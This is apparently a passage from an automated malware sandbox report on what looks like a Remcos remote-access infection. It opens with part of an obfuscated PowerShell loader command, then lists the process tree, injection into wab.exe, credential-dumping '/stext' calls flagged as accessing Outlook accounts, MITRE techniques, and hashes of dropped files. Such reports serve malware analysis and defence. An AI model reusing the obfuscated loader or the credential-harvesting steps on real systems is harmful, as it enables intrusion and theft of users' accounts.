Dubbovn Sikkerdprecir,rHullabainervimunFam.liegcl.bbineWilinesnLyttaef1 Balsam3Oliefyr9 Progra= Fidusm$Intervig MaksimlJugeredosoftbacbEpi,cleaEle trilPedas.u:Foste.sF BetingrexistendSammensiLinjedegGtt.rierKammedeeIldragetBestikktdiscoveeResolutr .ordannSpiredyeDeliber+ Epopee+Calyptr%Glub.ke$ nahumpVp adesea Kogt,enElekt.oaMantuasd isarmaa EpiphatF yingiePanorers Sign.l.ArchplucSubtraho Supracu ireannn Skabelt Palaeo ') ;$skriftsted=$Vanadates[$Praksisndringen139];}$Opposit=316532;$bankekds=30167;Hjttaleranlggenes (Hosernes ' .rdkla$UnderlegOversetlStandaroundstnvbOari paaEmbarkulUforsta:SnorksoU OmklasvKoe.sisoMump,rirsocialcnSla ekohTrans,oeFyreseddVer ifu A,elard= Fughet vaskomGvalo,uneEpoxy.atGenerat- Disa.pCElectrooA lersin Skjoldt Skat eeSi nficnFolke,itBarthia Forldea$PinjrakHFrinumraUddatablGrv.ingv igeretfPr.image U.pindmTeorichsBolarenaHisoveraNusser r KonseriDemocragPbelag.eSivenes1Transpa8Udblsni1Konsumf ');Hjttaleranlggenes (Hosernes ' Cornif$ Gu.umigStorgo lForfiltob,stedabNihcancaWatchhol Overfl:Kil,calMFormelli Bagwors ToldpopForankruDatidigtIndvoldtWhistleiHalvdannDuttetsgFor,etn Lynched= Turner Odontot[ SuffecSPreoccuyGvestessDi putat OevredeOvero,fm edrin.DepraveCCarneoloSpallspnFolkfotvMetalleeSatyrisr,endbartvobisga].opfolk:Bill,dh:udkonkuFsektorsrAfnatiooNonillumAdresseBMagtspia igtelss ommyereBrazils6 U.iten4 P eridS Cowf,ot pe.levrSep,imaiNondir.nKunstakg.tenogr(.ealisa$UncrumpU uperevUndergroNo.coherBruger,nP eoccuh UnisepeUrbanisdXiphosu)Beklage ');Hjttaleranlggenes (Hosernes 'Fremfus$JenaabngPassemelEllekiloB,naadobOdmarkoa Lal palLatestp:RigtigsiMic,onimRondaweb buketti DikessbAirligheSemicosrstatsejsBohem.b Opsgn.n=taberen Hyb,nkr[In dmmeSPukk,lsyVelbeslsVrdi,ovtR melige PterotmHyperki. BortelTCigarmaeRememorxGri mestSe,undy.berigelEUst.rlinSiegernc Lok,mooEnergipd Disfavi IsocyanResurregBoxbush],lwinhe:Brahman:ShoedepARisk esSVestjydC BronzeIS ivelsI.efence.TringciGStrickse Teks,etU vikliSGuaguantFa sterrOrchieciop,tninn MervfogCe.eban(Al enhe$Liga urMHen,tani Hypoc sStkningpPara.rau eft.rtt kyggestUdklknii,edsaltnGalninggAfskovn)Fiskepl ');Hjttaleranlggenes (Hosernes '.enophi$Natanieg dublerl ,iberaogymnostbRes.edlaJrgineslForeimp:DioxinsD UdslynuEmulsiofUdmn,esfVandetteIn laeslGennemscutriculoBintjeka Midd ltEmbo.tee Ove,vurUlidelin Cam,hoeBlokade=Checken$Unpla tiFrkenermm,adedibPowe,lei.ndgangbBurstine .ntrffr Bolshis Pounce.UnplashsEleva,ouPenaeagbBrochursT.ntacutEmydianrPygobraiGuar,ranKa akomg Morefo(uranome$SpaltniOfremdrapUnimpowpKulde,yoDa nebrs MiswenipeplesstAbomina,Pyrheli$ risikobInd,indasote.ionSatanisk Styr ne BrevskkLovtidedUn.uckismanip l)Gni.end ');Hjttaleranlggenes $Duffelcoaterne;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2392

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Retsvidners.For && echo t"
4⤵
PID:4520

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2608

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ytrbqwjlqjsazt"
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4676

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\anwtrpcfmrkfjhvhmj"
5⤵
- Accesses Microsoft Outlook accounts
PID:2932

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\kpbeshmgazcsmorlwubed"
5⤵
PID:3332

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\kpbeshmgazcsmorlwubed"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1008

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Email Collection

T1114

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat
Filesize
144B

MD5
2e622cc8a00def1cf06150673d662d02

SHA1
7d170305723c5a1c006c275b139ad2c9b54f3dfa

SHA256
cb99a1a8064e87dd098dd4e48afeb63591e761d259c4d6c693ee79853384cbf7

SHA512
05b108d9f8131ad5c9cb073d41cbb37dd61f9047eaefd7e5a3974e54bcd87aa682714ff4b0e8ab28e94cfa89c73831003d1dce9ebbe5bbb8da6b666efbbc5956

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rcoqqtda.my4.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ytrbqwjlqjsazt
Filesize
4KB

MD5
73ddf6cd83c2ad8a2fbb2383e322ffbc

SHA1
05270f8bb7b5cc6ab9a61ae7453d047379089147

SHA256
0ef9194c6e90b23c416316fc5a15f549ee5b2472014fcd7648d72ca9a865b409

SHA512
714db1956faa795005b15324b9604105881d6b484fe899876fe0df85783c61a72f556a875833af8625625212503b95eea2eb353a1d98f6a7af47a3658ea5262d

Download Submit
C:\Users\Admin\AppData\Roaming\Retsvidners.For
Filesize
451KB

MD5
4b027f10a9ba55fbce88cc0de8552d86

SHA1
d9ff1ca78a85579006efb1aa6cf5b55c8d5cf079

SHA256
46be653f722c5d6427efd1d53e3197cc24aba34c3c0d525ba1f27e189614421e

SHA512
f0c6b56185c82ac4ad34578f8442009e935bd99d4e4750bbd8edda446200fd1b003078f5a1e674813fada341e1aa214b09fefdb63f14065338f3d5685a9072c1

Download Submit
memory/1008-59-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1008-62-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1008-60-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2392-24-0x00000000057B0000-0x0000000005816000-memory.dmp

Filesize
408KB

Download
memory/2392-41-0x00000000070E0000-0x0000000007102000-memory.dmp

Filesize
136KB

Download
memory/2392-23-0x0000000004FE0000-0x0000000005002000-memory.dmp

Filesize
136KB

Download
memory/2392-22-0x0000000005050000-0x0000000005678000-memory.dmp

Filesize
6.2MB

Download
memory/2392-25-0x0000000005820000-0x0000000005886000-memory.dmp

Filesize
408KB

Download
memory/2392-35-0x00000000059B0000-0x0000000005D04000-memory.dmp

Filesize
3.3MB

Download
memory/2392-36-0x0000000005E90000-0x0000000005EAE000-memory.dmp

Filesize
120KB

Download
memory/2392-37-0x0000000005ED0000-0x0000000005F1C000-memory.dmp

Filesize
304KB

Download
memory/2392-38-0x0000000007820000-0x0000000007E9A000-memory.dmp

Filesize
6.5MB

Download
memory/2392-39-0x0000000006FC0000-0x0000000006FDA000-memory.dmp

Filesize
104KB

Download
memory/2392-40-0x00000000071A0000-0x0000000007236000-memory.dmp

Filesize
600KB

Download
memory/2392-44-0x0000000008450000-0x000000000B302000-memory.dmp

Filesize
46.7MB

Download
memory/2392-42-0x0000000007EA0000-0x0000000008444000-memory.dmp

Filesize
5.6MB

Download
memory/2392-21-0x0000000002570000-0x00000000025A6000-memory.dmp

Filesize
216KB

Download
memory/2532-16-0x00007FFDB32A0000-0x00007FFDB3D61000-memory.dmp

Filesize
10.8MB

Download
memory/2532-10-0x000001E55FD40000-0x000001E55FD62000-memory.dmp

Filesize
136KB

Download
memory/2532-52-0x00007FFDB32A0000-0x00007FFDB3D61000-memory.dmp

Filesize
10.8MB

Download
memory/2532-4-0x00007FFDB32A3000-0x00007FFDB32A5000-memory.dmp

Filesize
8KB

Download
memory/2532-18-0x00007FFDB32A0000-0x00007FFDB3D61000-memory.dmp

Filesize
10.8MB

Download
memory/2532-17-0x00007FFDB32A3000-0x00007FFDB32A5000-memory.dmp

Filesize
8KB

Download
memory/2532-15-0x00007FFDB32A0000-0x00007FFDB3D61000-memory.dmp

Filesize
10.8MB

Download
memory/2608-54-0x0000000000670000-0x00000000018C4000-memory.dmp

Filesize
18.3MB

Download
memory/2608-76-0x0000000000670000-0x00000000018C4000-memory.dmp

Filesize
18.3MB

Download
memory/2608-85-0x0000000000670000-0x00000000018C4000-memory.dmp

Filesize
18.3MB

Download
memory/2608-82-0x0000000000670000-0x00000000018C4000-memory.dmp

Filesize
18.3MB

Download
memory/2608-46-0x0000000000670000-0x00000000018C4000-memory.dmp

Filesize
18.3MB

Download
memory/2608-79-0x0000000000670000-0x00000000018C4000-memory.dmp

Filesize
18.3MB

Download
memory/2608-70-0x00000000203C0000-0x00000000203D9000-memory.dmp

Filesize
100KB

Download
memory/2608-73-0x00000000203C0000-0x00000000203D9000-memory.dmp

Filesize
100KB

Download
memory/2608-74-0x00000000203C0000-0x00000000203D9000-memory.dmp

Filesize
100KB

Download
memory/2932-64-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2932-57-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2932-63-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/4676-61-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/4676-56-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/4676-58-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download